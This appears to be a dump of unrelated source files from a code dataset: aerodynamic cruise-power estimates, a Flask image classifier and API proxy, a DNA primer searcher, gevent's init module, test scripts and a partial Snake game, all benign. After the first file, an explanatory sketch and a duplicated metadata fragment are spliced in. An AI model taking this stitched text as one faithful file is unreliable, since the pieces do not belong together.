unknowns['Cd0Wing'] = params['wingProfileCD']\n\n            # Overall profile drag\n            unknowns['Cd0'] = unknowns['Cd0Wing'] + unknowns['SCdFuse'] / unknowns['SRef']\n\n            # Span efficiency\n            unknowns['e'] = 1.3\n\n            # Solve for CL at cruise\n            unknowns['CL'] = params['W'] / (0.5 * rho * params['V']**2 * unknowns['SRef'])\n\n            # Prop efficiency\n            unknowns['etaProp'] = 0.8\n\n            # Estimate drag at cruise using quadratic drag polar\n            unknowns['D'] = 0.5 * rho * params['V']**2 * (unknowns['SRef'] * (unknowns['Cd0'] + \\\n                unknowns['CL']**2 / (math.pi * unknowns['AR'] * unknowns['e'])) + unknowns['SCdFuse'])\n\n            # Compute cruise power estimate\n            unknowns['PCruise'] = unknowns['D'] * params['V']\n\n            # Battery power\n            unknowns['PBattery'] = unknowns['PCruise'] / unknowns['etaProp'] / unknowns['etaMotor']\n\n            # Cruise L/D\n            unknowns['LoverD'] = params['W'] / unknowns['D']\n\n        elif (params['Vehicle'].lower().replace('-', '') == \"helicopter\"):\n            # Motor efficiency\n            unknowns['etaMotor'] = 0.85 * 0.98  # Assumed motor and gearbox efficiencies (85%, and 98% respectively)\n\n            # Tip Mach number constraint\n            MTip = 0.65\n\n            # Tip loss factor \n            unknowns['B'] = 0.97\n\n            # Blade solidity\n            unknowns['sigma'] = 0.1\n\n            # Blade profile drag coefficient\n            unknowns['Cd0'] = 0.012\n\n            # Compute rotation rate at cruise to be at tip mach limit\n            unknowns['omega'] = (340.2940 * MTip - params['V']) / params['rProp']\n\n            # Fuselage drag\n            unknowns['D'] = 0.5 * rho * (params['V']**2) * unknowns['SCdFuse']\n\n            # Inflow angle \n            unknowns['alpha'] = math.atan2(unknowns['D'], params['W'])\n\n            # Compute advance ratio\n            unknowns['mu'] = params['V'] * math.cos(unknowns['alpha']) / (unknowns['omega'] * params['rProp'])\n\n            # Thrust coefficient (including tip loss factor for effective disk area)\n            unknowns['Ct'] = params['W'] / (rho * math.pi * params['rProp']**2 * unknowns['B']**2 * unknowns['omega']**2 * params['rProp']**2)\n\n            # Solve for induced velocity /w Newton method (see \"Helicopter Theory\" section 4.1.1)\n            unknowns['lambda'] = unknowns['mu'] * math.tan(unknowns['alpha']) + unknowns['Ct'] / \\\n                (2.0 * math.sqrt(unknowns['mu']**2.0 + unknowns['Ct']/2.0))\n            for i in range(5):\n                unknowns['lambda'] = (unknowns['mu'] * math.tan(unknowns['alpha']) + \\\n                    unknowns['Ct'] / 2.0 * (unknowns['mu']**2.0 + 2.0*unknowns['lambda']**2) / \\\n                    (unknowns['mu']**2.0 + unknowns['lambda']**2)**1.5) / \\\n                    (1.0 + unknowns['Ct']/2.0 * unknowns['lambda'] / (unknowns['mu']**2 + unknowns['lambda']**2.0)**1.5)\n            unknowns['v'] = unknowns['lambda'] * unknowns['omega'] * params['rProp'] - params['V'] * math.sin(unknowns['alpha'])\n\n            # Power in forward flight (see \"Helicopter Theory\" section 5-12)\n            unknowns['PCruise'] = params['W'] * (params['V'] * math.sin(unknowns['alpha']) + 1.3 * math.cosh(8 * unknowns['mu']**2) * unknowns['v'] + \\\n                unknowns['Cd0'] * unknowns['omega'] * params['rProp'] * \\\n                (1 + 4.5 * unknowns['mu']**2 + 1.61 * unknowns['mu']**3.7) * \\\n                (1 - (0.03 + 0.1 * unknowns['mu'] + 0.05 * math.sin(4.304 * unknowns['mu'] - 0.20)) * \\\n                (1-math.cos(unknowns['alpha'])**2)) / 8 / (unknowns['Ct'] / unknowns['sigma']))\n\n            # 10% power added for helicopter tail rotor\n            unknowns['PCruise'] = 1.1 * unknowns['PCruise']\n\n            # Equivalent L/D, assuming power = D * V and L = W\n            unknowns['LoverD'] = params['W'] / (unknowns['PCruise'] / params['V'])\n\n            # Battery power\n            unknowns['PBattery'] = unknowns['PCruise'] / unknowns['etaMotor']\n\n        else:\n            pass\n\n\nif __name__ == \"__main__\":\n    top = Problem()\n    root = top.root = Group()\n\n    # Sample Inputs\n    indep_vars_constants = [('Vehicle', u'helicopter', {'pass_by_obj':True}),\n                            ('rProp', 1.4),\n                            ('V', 50.0),\n                            ('W', 2000.0)]\n\n    root.add('Inputs', IndepVarComp(indep_vars_constants))\n\n    root.add('Example', CruisePower())\n\n    root.connect('Inputs.Vehicle', 'Example.Vehicle')\n    root.connect('Inputs.rProp', 'Example.rProp')\n    root.connect('Inputs.V', 'Example.V')\n    root.connect('Inputs.W', 'Example.W')\n\n    top.setup()\n    top.run()\n    \n    print(\"Helicopter..\")\n    print(\"PBattery:\", top['Example.PBattery'])\n    print(\"etaProp:\", top['Example.etaProp'])\n    print(\"etaMotor:\", top['Example.etaMotor'])\n    print(\"CLmax:\", top['Example.CLmax'])\n    print(\"bRef:\", top['Example.bRef'])\n    print(\"SRef:\", top['Example.SRef'])\n    print(\"cRef:\", top['Example.cRef'])\n    print(\"AR:\", top['Example.AR'])\n    print(\"D:\", top['Example.D'])\n    print(\"PCruise:\", top['Example.PCruise'])\n    print(\"PBattery:\", top['Example.PBattery'])\n    print(\"Cd0:\", top['Example.Cd0'])\n    print(\"CL:\", top['Example.CL'])\n    print(\"LoverD:\", top['Example.LoverD'])\n    print(\"omega:\", top['Example.omega'])\n    print(\"alpha:\", top['Example.alpha'])\n    print(\"mu:\", top['Example.mu'])\n    print(\"Ct:\", top['Example.Ct'])\n    print(\"lambda:\", top['Example.lambda'])\n    print(\"v:\", top['Example.v'])\n    print(\"SCdFuse:\", top['Example.SCdFuse'])\n    print(\"Cd0Wing:\", top['Example.Cd0Wing'])\n    print(\"e:\", top['Example.e'])\n    print(\"B:\", top['Example.B'])\n    print(\"sigma:\", top['Example.sigma'])\n    \n    \n    # Example\n    # top['Inputs.Vehicle'] = u'helicopter'\n    \n    # top.run()\n    \n    # print(\"Helicopter.. PBattery:\", top['Example.PBattery'])\n    # print(\"Helicopter.. mu:\", top['Example.mu'])\n    # print(\"Helicopter.. alpha:\", top['Example.alpha'])\n    # print(\"Helicopter.. omega:\", top['Example.omega'])   \n    \n    # top['Inputs.V'] = 30.0\n    \n    # top.run()\n    # print(\"Inputs.V.. V:\", top['Inputs.V'])\n    # print(\"Helicopter.. PBattery:\", top['Example.PBattery'])\n    # print(\"Helicopter.. mu:\", top['Example.mu'])\n    # print(\"Helicopter.. alpha:\", top['Example.alpha'])\n    # print(\"Helicopter.. omega:\", top['Example.omega'])\n    \n    # top['Inputs.V'] = 80.0\n    \n    # top.run()\n    # print(\"Inputs.V.. V:\", top['Inputs.V'])\n    # print(\"Helicopter.. PBattery:\", top['Example.PBattery'])\n    # print(\"Helicopter.. mu:\", top['Example.mu'])\n    # print(\"Helicopter.. alpha:\", top['Example.alpha'])\n    # print(\"Helicopter.. omega:\", top['Example.omega'])","sub_path":"scripts/cruise_power_what_if.py","file_name":"cruise_power_what_if.py","file_ext":"py","file_size_in_byte":11395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
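To make the helicopter branch concrete, here is a standalone sketch of its first steps - tip-Mach-limited rotor speed, fuselage drag, inflow angle, and advance ratio - using the same sample inputs as the __main__ block above (rProp=1.4, V=50, W=2000):

import math

MTip = 0.65          # tip Mach number constraint
rProp = 1.4          # rotor radius [m]
V = 50.0             # cruise speed [m/s]
W = 2000.0           # weight [N]
rho = 1.225          # air density [kg/m^3]
SCdFuse = 0.35       # fuselage/gear drag area [m^2]

omega = (340.2940 * MTip - V) / rProp        # rotor speed keeping the advancing tip at MTip
D = 0.5 * rho * V**2 * SCdFuse               # fuselage drag [N]
alpha = math.atan2(D, W)                     # inflow angle [rad]
mu = V * math.cos(alpha) / (omega * rProp)   # advance ratio
print(round(omega, 1), round(alpha, 3), round(mu, 3))   # 122.3 0.262 0.282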
omega:\", top['Example.omega'])","sub_path":"scripts/cruise_power_what_if.py","file_name":"cruise_power_what_if.py","file_ext":"py","file_size_in_byte":11395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"40757630","text":"'''\nAuthor: P.Suman\nCreated Date: Nov 30, 2015\nDescription: Verify that while granting access of service, the Admin is unable to see all the Read-only \n users defined for the appliance.\n'''\nfrom tests.globalImports import *\n\ntc_id=utility.get_tc_data(__file__)\n\nclass Testcase(Manager.Manager): \n \"\"\"\n While granting access of service, the Admin is unable to see all the Read-only users defined for the appliance\n \"\"\"\n \n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialization\n \"\"\"\n Manager.Manager.__init__(self, tc_id, *args, **kwargs) \n \n @BaseClass.TestBase.func_exec\n def test_functionality(self): \n \"\"\"\n This is the execution starting function\n \"\"\"\n serviceName=\"Test Service\"\n templateName = \"Test Template\"\n self.browserObject = globalVars.browserObject\n \n #Check for current logged in user\n self.verifyCurrentUser(userRole='Administrator', loginAsUser=True)\n \n #Creates Sample Template if not exists\n self.createSampleTemplate(templateName=templateName, publishedTemplate=True)\n \n #Check for user\n self.verifyCurrentUser(userRole='Read only', loginAsUser=False)\n \n #Get Service List\n serviceList = self.getServices(serviceName=serviceName)\n if len(serviceList) <= 0:\n self.deployService(templateName, serviceName)\n \n #Deploy Service\n userList = self.getUsersFromDeployService(templateName, serviceName)\n self.succeed(\"User List while Deploying Service :: %s\"%str(userList))\n checkReadonlyUsers = [user for user in userList if user[\"Role\"] == \"Read only\"]\n if len(checkReadonlyUsers) > 0:\n self.failure(\"Admin is able to see 'Read only' Users while Deploying Service :: %s\"%(str(checkReadonlyUsers)), \n raiseExc=True)\n else:\n self.succeed(\"Admin is not able to see any 'Read only' Users while Deploying Service\")","sub_path":"GUI/gui-automation-ASMvNext84UI/tests/rbac/Testcase_NGI_TC_2680.py","file_name":"Testcase_NGI_TC_2680.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"530696594","text":"'''\n\nbinary trees\n\niterative in order traversal- gives you a BT, nodes have\nvalue property, integers, as well as parent node value,\nmeaning node has access to parent\n\nnodes have left and right child nodes\n\nquestion- traverse BT with in order traversal, gives you a\ncallback for each encounter, but wants you to do it iteratively\n\nin order means- constant space\n\nin order traversal means traversing:\n\nleft child\nnode\nright child\n\ncan't use recursive calls (a stack) or a queue, although what if\nyou used a queue that always had constant space\n\nin order to determine if the cb gets called, have to track current\nprevious, and next nodes\n\n\t\t1\n\t / \\\n\t 2 3 \n\t /\t / \\\n\t4 6 7\n\t \\\n\t 9\n\nin order results in: 4, 9, 2, 1, 6, 3, 7\n\nat root, previous is null, current is root, if left, next is left,\nif not, next is right\n\ntraverse left, then previous is the root (1), current is left child of\nroot (2)\n\nif previous node is current node's parent, then we need to continue\nexploring down \n\nif theres a left node, move down (4)\n\nsince there's no left child for 4, at 4 calls its callback before\nexploring its right child \n\nexplore the 
+{"seq_id":"404883962","text":"# -*- encoding: utf-8 -*-\n'''\n@File    :   run_MF.py\n@Time    :   2021/04/01 16:32:06\n@Author  :   Liu Qidong\n@Version :   1.0\n@Contact :   dong_liuqi@163.com\n'''\n\n# here put the import lib\nimport json\nimport torch\nfrom layers.input import *\nfrom utils.utils import *\nfrom dataset import RecRankTest, RecTest\nfrom model.MF import MF\n\n\ndef run_MF(args):\n\n    with open('./data/' + args.dataset + '/info.json', 'r') as f:\n        info = json.load(f)\n\n    '''Step 1: Construct input module'''\n    # Take the full feature set here; feature selection can happen when the\n    # model builds its input module.\n    dense = [denseFeat(sf, info['vocabulary_size'][sf], \n                       info['feat_index'][sf], \n                       group_name=sf.split('_')[0]) \n             for sf in info['feat_type']['cont']]\n    sparse = [sparseFeat(sf, info['vocabulary_size'][sf], \n                         info['feat_index'][sf], \n                         group_name=sf.split('_')[0]) \n              for sf in info['feat_type']['cate']]\n    sequence = [sequenceFeat(sf, info['vocabulary_size']['item_' + sf.split('_')[1]], \n                             info['feat_index']['item_' + sf.split('_')[1]], \n                             group_name=sf.split('_')[0]) \n                for sf in info['feat_type']['sequence']]\n    feat_list = dense + sparse + sequence\n\n    '''Step 2: select features for constructing model'''\n    user_feat = ['user_id']\n    item_feat = ['item_id']\n    behavior_feat = []\n\n    '''Step 3: construct model and use cuda'''\n    model = MF(feat_list, args, use_bias=False)\n    if args.use_cuda:\n        device = torch.device('cuda:' + str(args.device_tab))\n        model.to(device)\n\n    '''Step 4: train model or load model'''\n    if args.load_m:\n        model = load_model(model, args)\n    else:\n        model.fit()\n\n    '''Step 5: evaluation'''\n    if args.es:\n        model._load_model()\n    test_set = RecTest(args)\n    
model.evaluate(test_set)\n test_rank = RecRankTest(args)\n model.rank_evaluate(test_rank, topk=10)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"examples/run_MF.py","file_name":"run_MF.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189231551","text":"\"\"\"\nTests for the gait2392geomcustomiser.py module\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport copy\nsys.path.append('../')\nimport gait2392geomcustomiser as g23\nfrom gias2.fieldwork.field import geometric_field\nfrom gias2.musculoskeletal.bonemodels import bonemodels\nreload(g23)\n\nfrom lltransform import LLTransformData\n\nSELF_DIRECTORY = os.path.split(__file__)[0]\n_shapeModelFilenameLeft = os.path.join(SELF_DIRECTORY, 'data/shape_models/LLP26_rigid.pc')\n_boneModelFilenamesLeft = {'pelvis': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/pelvis_combined_cubic_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/pelvis_combined_cubic_flat.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/pelvis_combined_cubic_flat.mesh'),\n ),\n 'femur': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/femur_left_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/femur_left_quartic_flat.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/femur_left_quartic_flat.mesh'),\n ),\n 'patella': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/patella_left_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/patella_11_left.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/patella_11_left.mesh'),\n ),\n 'tibiafibula': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/tibia_fibula_cubic_left_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/tibia_fibula_left_cubic_flat.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/tibia_fibula_left_cubic_flat.mesh'),\n ),\n }\n\ndef _outputModelDict(LL):\n outputModelDict = dict([(m[0], m[1].gf) for m in LL.models.items()])\n return outputModelDict\n\n\n# generate a custom left lower limb geometry\nll_params = ([1.0,],[0,], [0,0,0,0,0,0], [0.0,0.0,0.0],[-np.pi/4])\nLL = bonemodels.LowerLimbLeftAtlas('lower_limb_left')\nLL.bone_files = _boneModelFilenamesLeft\nLL.combined_pcs_filename = _shapeModelFilenameLeft\nLL.load_bones()\nLL.update_all_models(*ll_params)\ninputModelDict = _outputModelDict(LL)\n# inputModelDict['femur-left'] = inputModelDict['femur']\n# inputModelDict['tibiafibula-left'] = inputModelDict['tibiafibula']\n\nllt = LLTransformData()\nllt.pelvisRigid = ll_params[2]\nllt.hipRot = ll_params[3]\nllt.kneeRot = ll_params[4]\n\n# test config file\noutput_dir = str(os.path.join(os.path.split(__file__)[0], 'output/'))\nconfig = {'osim_output_dir': output_dir,\n 'convert_mm_to_m': True,\n 'scale_other_bodies': False,\n 'write_osim_file': True,\n }\n\n# instantiate customiser\ncust = g23.Gait2392GeomCustomiser(config)\ncust.set_left_lowerlimb_gfields(inputModelDict)\ncust.ll_transform = llt\n\n# customise each bone\n# cust.cust_osim_pelvis()\n# cust.cust_osim_femur_left()\n# cust.cust_osim_tibiafibula_left()\n# cust.cust_osim_ankle_left()\ncust.customise()\n\n# print('writing')\n# write out customised osim file\n# cust.write_cust_osim_model()\n\n\nknee_angles = 
g23.calc_knee_angles(cust.LL)\nprint(knee_angles)","sub_path":"server/backend/geom/testing/gait2392geomcustomiser_test.py","file_name":"gait2392geomcustomiser_test.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"521329054","text":"from flask import Flask, render_template, request, jsonify\nimport numpy as np\nimport cv2\n#import keras.models\nimport re\nimport sys\nimport os\nfrom io import BytesIO\n#Set Model Path\nsys.path.append(os.path.abspath('./model'))\nfrom model_loader import *\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'static'\nglobal model, graph\nmodel, graph = init_models()\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n    file = request.files['file']\n    # np.fromstring is deprecated for binary input; frombuffer reads the bytes directly\n    image = cv2.imdecode(np.frombuffer(BytesIO(file.read()).getvalue(), dtype=np.uint8), 1)\n    image = image[:, :, ::-1]  # BGR -> RGB\n    print(\"Uploaded\")\n    pred, width, height = predict_image(image)\n    print(\"Predicted\")\n    return jsonify({'width': width, 'height' : height, 'preds' : pred.tolist() })\n\ndef predict_image(image):\n    overlay = np.ones([int(image.shape[0] / 165), int(image.shape[1] / 165)])\n    with graph.as_default():\n        width = image.shape[0] / 165\n        height = image.shape[1] / 165\n        for i in range(int(width)):\n            for j in range(int(height)):\n                xi = image[i * 165: (i + 1) * 165, j * 165: (j + 1) * 165] / 255\n                xi = xi.reshape(1, 165, 165, 3)\n                out = model.predict(xi)\n                result = np.argmax(out)\n                overlay[i, j] = result\n    return overlay, int(width), int(height)\n\nif __name__ == '__main__':\n    port = int(os.environ.get('PORT', 8085))\n    app.run(host='127.0.0.1', port=port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
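A small client-side check of the /upload route above; the host and port match the app.run() call, and test.jpg is a placeholder image path:

import requests

# POST an image to the tiling classifier; the form field name must be 'file'
with open("test.jpg", "rb") as f:
    resp = requests.post("http://127.0.0.1:8085/upload", files={"file": f})

data = resp.json()
print(data["width"], data["height"])   # number of 165x165 tiles per axis
print(data["preds"])                   # per-tile argmax class indices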
+{"seq_id":"292587425","text":"\n\nfrom xai.brain.wordbase.nouns._referee import _REFEREE\n\n# class header\nclass _REFEREES(_REFEREE, ):\n\tdef __init__(self,): \n\t\t_REFEREE.__init__(self)\n\t\tself.name = \"REFEREES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"referee\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_referees.py","file_name":"_referees.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"600014821","text":"import pandas as pd\nimport re\nimport os\nfrom flask import current_app, flash\n\nfrom flaskr.framework.model.Io.txt_file import TXTFILE\nfrom flaskr.framework.exception import InvalidArgument\nfrom flaskr.genomics.model.helper import get_reverse\n\n\nclass Searcher():\n    def __init__(\n            self,\n    ):\n        self.sequence = ''\n        self.location = -1\n        self.ignore_location = -1\n        self.primer = ''\n        self.reverse = False\n        self.request = None\n        self.max_line_checks = 5\n\n    def execute(self, request):\n        self.request = request\n\n        primers = self.get_primers()\n\n        fasta_files = []\n        try:\n            for file in self.request.files.getlist(\"fastafile[]\"):\n                fasta_files.append(TXTFILE(file))\n        except InvalidArgument:\n            flash('An invalid file was provided, please make sure you are uploading a .txt file', 'error')\n            return None\n\n        result_string = ['']\n        for p, primer in enumerate(primers):\n            primer = primer.lower()\n            self.primer = primer\n            result_string.append('Primer: ' + self.primer)\n            flash('Primer: ' + self.primer)\n\n            for file in fasta_files:\n                result_string.append('File: ' + file.name)\n                flash('File: ' + file.name)\n\n                search_count = 0\n                self.reverse = False\n                self.location = -1\n                primer_not_found = False\n\n                for idx, (name, self.sequence) in enumerate(file.read()):\n                    try:\n                        re.match(\"[AaTtGgCc]*\", self.sequence)\n                    except TypeError:\n                        flash('invalid sequence format, please check your primer sequence and try again', 'error')\n                        result_string.append('invalid sequence format, please check your primer sequence and try again')\n                        current_app.logger.error(\"invalid sequence, please check primer sequence %s and try again\"\n                                                 % name)\n                        break\n\n                    if self.reverse:\n                        get_reverse(self)\n\n                    # find location of primer\n                    if search_count < 3:  # only search the first 3 sequences for the primer location\n                        search_count += 1\n                        if not self.get_location():\n                            primer_not_found = True\n                            continue\n                        else:\n                            search_count = 0\n                    elif primer_not_found:\n                        break\n                    self.sequence = self.sequence[self.location:self.location + len(self.primer)]\n\n                    # search aligned location for differences\n                    differences = []\n                    if primer not in self.sequence and self.location > -1:\n                        for seq_idx, letter in enumerate(self.sequence):\n                            if letter != self.primer[seq_idx] and letter != 'n':\n                                differences.append(\n                                    'position %s, change from %s -> %s' % (\n                                        str(seq_idx), str(primer[seq_idx]), str(letter)))\n\n                    if len(differences) > len(primer)/2:\n                        # probably identified the wrong location if the next sequences aren't even close\n                        self.reset_location()\n                        current_app.logger.error('There may be an error in the primer %s found in file %s: more '\n                                                 'than half the located alignment differs from the expected primer'\n                                                 % (self.primer, file.name))\n                        continue\n\n                    if len(differences) > 0:\n                        result_string.append(' ' + name)\n                        result_string.append(' ' + ''.join(differences))\n                        result_string.append('')\n                        flash(name)\n                        flash(''.join(differences))\n\n                if primer_not_found:\n                    result_string.append(' not found')\n                    flash(' not found')\n            result_string.append('---------------------------------------')\n            flash('---------------------------------------')\n\n        for file in fasta_files:\n            file.delete()\n        return result_string\n\n    def get_primers(self):\n        if not self.request.files.get('primer_list'):\n            primer_file = os.path.join(current_app.static_folder, 'files', 'primers.xlsx')\n        else:\n            primer_file = self.request.files['primer_list']\n        df = pd.read_excel(primer_file, sheet_name='Sheet1')\n        return df['Sequence']\n\n    def reset_location(self):\n        self.ignore_location = self.location\n        self.location = -1\n        self.get_location()\n\n    def get_location(self):\n        if self.location >= 0:\n            return True\n\n        if self.primer in self.sequence:\n            self.location = self.sequence.find(self.primer)\n            return True\n\n        get_reverse(self)\n        if self.primer in self.sequence:\n            self.location = self.sequence.find(self.primer)\n            self.reverse = True\n            return True\n\n        # TODO: only identifying strings with less than 4 character differences from the primer\n        # TODO: also this makes the program SLOW!\n        wild_cards = 1\n        while not self.get_wild_card_primer(wild_cards):\n            get_reverse(self)\n            wild_cards += .5\n\n            if wild_cards >= 4:\n                return False\n\n        # the while loop only exits here after a successful wild-card match\n        return True\n\n    def get_wild_card_primer(self, wild_cards):\n        wild_cards = int(wild_cards)\n        num_letters = len(self.primer)\n\n        for idx in range(num_letters):\n            wild_primer = self.primer[:idx] + '.' + self.primer[idx + 1:]\n            if wild_cards == 1:\n                single_wild = re.compile(wild_primer)\n                search = re.search(single_wild, self.sequence)\n                if search is not None and self.location != self.ignore_location:\n                    self.location = search.span(0)[0]\n                    return True\n\n            elif wild_cards == 2:\n                for idx2 in range(idx + 1, num_letters):\n                    double_wilds = re.compile(wild_primer[:idx2] + '.' + wild_primer[idx2 + 1:])\n                    search = re.search(double_wilds, self.sequence)\n                    if search is not None and self.location != self.ignore_location:\n                        self.location = search.span(0)[0]\n                        return True\n\n            elif wild_cards == 3:\n                for idx2 in range(idx + 1, num_letters):\n                    double_wilds = wild_primer[:idx2] + '.' + wild_primer[idx2 + 1:]\n                    for idx3 in range(idx2 + 1, num_letters):\n                        triple_wilds = re.compile(double_wilds[:idx3] + '.' + double_wilds[idx3 + 1:])\n                        search = re.search(triple_wilds, self.sequence)\n                        if search is not None and self.location != self.ignore_location:\n                            self.location = search.span(0)[0]\n                            return True\n\n        return False\n","sub_path":"flaskr/genomics/model/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"114427593","text":"# coding: utf-8\nfrom __future__ import absolute_import\n\n\n__all__ = ['get_hub',\n           'Greenlet',\n           'GreenletExit',\n           'spawn',\n           'spawn_later',\n           'spawn_raw',\n           'iwait',\n           'wait',\n           'killall',\n           'Timeout',\n           'with_timeout',\n           'getcurrent',\n           'sleep',\n           'idle',\n           'kill',\n           'signal',\n           'fork',\n           'reinit']\n\n\nimport sys\nif sys.platform == 'win32':\n    import socket\n    del socket\n\nfrom gevent.hub import get_hub, iwait, wait\nfrom gevent.greenlet import Greenlet, joinall, killall  # thin wrappers around the native greenlet API\njoinall = joinall\nspawn = Greenlet.spawn\nspawn_later = Greenlet.spawn_later\n\nfrom gevent.timeout import Timeout, with_timeout\nfrom gevent.hub import getcurrent, GreenletExit, spawn_raw, sleep, idle, kill, reinit\ntry:\n    from gevent.os import fork\nexcept ImportError:\n    __all__.remove('fork')\n\n\nfrom gevent.hub import signal as _signal_class\nfrom gevent import signal as _signal_module\nclass _signal_metaclass(type):\n\n    def __getattr__(cls, name):\n        return getattr(_signal_module, name)\n\n    def __setattr__(cls, name, value):\n        setattr(_signal_module, name, value)\n\n    def __instancecheck__(cls, instance):\n        return isinstance(instance, _signal_class)\n\n    def __dir__(cls):\n        return dir(_signal_module)\nclass signal(object):\n\n    __doc__ = _signal_module.__doc__\n\n    def __new__(cls, *args, **kwargs):\n        return _signal_class(*args, **kwargs)\nsignal = _signal_metaclass(str(\"signal\"), (), dict(signal.__dict__))\nsys.modules['gevent.signal'] = signal\nsys.modules['gevent.hub'].signal = signal\ndel sys","sub_path":"src/gevent/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129756680","text":"\"\"\"\nIf an exception is raised while the try clause is executing and it matches the\nexception type named after the except keyword, the corresponding except clause\nruns; execution then continues after the try statement.\n\"\"\"\n\ndef get_number():\n    \"return a float number\"\n    number = float(input(\"Enter a float number: \"))\n    return number\n\nwhile True:\n    try:\n        print(get_number())\n    except ValueError:\n        print(\"You entered a wrong value\")\n","sub_path":"异常/except_something.py","file_name":"except_something.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
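The same pattern extends naturally: several except clauses are tried in order, and an optional else clause runs only when no exception occurred. A small extension of the demo above:

def get_number():
    "return a float number"
    return float(input("Enter a float number: "))

while True:
    try:
        number = get_number()
    except ValueError:
        print("You entered a wrong value")     # retry on bad input
    except (EOFError, KeyboardInterrupt):
        print("No input - giving up")
        break
    else:
        print(number)                          # runs only if no exception was raised
        break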
+{"seq_id":"558740633","text":"from flask import jsonify, request, Blueprint\nfrom requests import get\n\n\nMAX_CALLS = 30\nBASE_URL = 'https://www.themuse.com/api/public/'\n\nbp = Blueprint('blueprint', __name__)\n\n\n@bp.route('/load', methods=['GET'])\ndef get_companies():\n all_companies = []\n for i in range(MAX_CALLS):\n r = get(f'{BASE_URL}companies', params={'page': i})\n data = r.json()\n all_companies.extend(data.get('results'))\n if data.get('page_count') == i:\n break\n industries, locations = format_data(all_companies)\n return jsonify({'company_industries': industries, 'company_locations': locations}), 200\n\n\n@bp.route('/', defaults={'path': ''})\n@bp.route('/')\ndef proxy(path):\n path = path.strip('/')\n r = get(f'{BASE_URL}{path}', params=request.args)\n # return jsonify(r.json()['results']), 200\n return jsonify(r.json()), 200\n\n\ndef format_data(companies):\n all_locations = set()\n all_industries = set()\n\n for company in companies:\n locations = list(map(lambda x: x.get('name'), company.get('locations')))\n industries = list(map(lambda x: x.get('name'), company.get('industries')))\n\n all_locations.update(locations)\n all_industries.update(industries)\n\n return list(all_industries), list(all_locations)\n","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"644526756","text":"#Ivana Olvera Mérida A01746744\r\n#PROYECTO FINAL: Integrar todos los conocimientos aprendidos\r\n#durante el curso para crear un videojuego sencillo en Python.\r\n#Videojuego: SNAKE\r\n\r\nimport pygame\r\nimport random\r\n\r\n#Dimensiones de la pantalla\r\nfrom pygame.sprite import Sprite\r\n\r\nANCHO = 800\r\nALTO = 600\r\n#Colores\r\nBLANCO = (255, 255, 255)\r\nVERDE_BANDERA = (27, 94, 32)\r\nROJO = (255, 0, 0)\r\nAZUL = (0, 0, 255)\r\nAMARILLO = (239, 239, 4)\r\nNEGRO = (0, 0, 0)\r\n\r\n\r\ndef checarColisiones(listaComida, listaSerpiente):\r\n estatus = False #El estado comienza como FALSE = 0\r\n for serpiente in listaSerpiente:\r\n borrarComida = False\r\n for k in range(len(listaComida) - 1, -1, -1):\r\n comida = listaComida[k]\r\n xb, yb, ab, alb = serpiente.rect\r\n xe, ye, ae, ale = comida.rect\r\n if (xe == xb and yb == ye and ab == ae and alb == ale):\r\n estatus = True\r\n borrarComida = True\r\n if borrarComida == True: #Si la serpiente choca con la comida, el estado de borrarComida se vuelve TRUE\r\n listaComida.pop() #Va a eliminar el dato que se tiene\r\n\r\n if estatus == True: #Si el estado pasa a ser TRUE (choque entre la serpiente y la comida), se regresará un punto. 
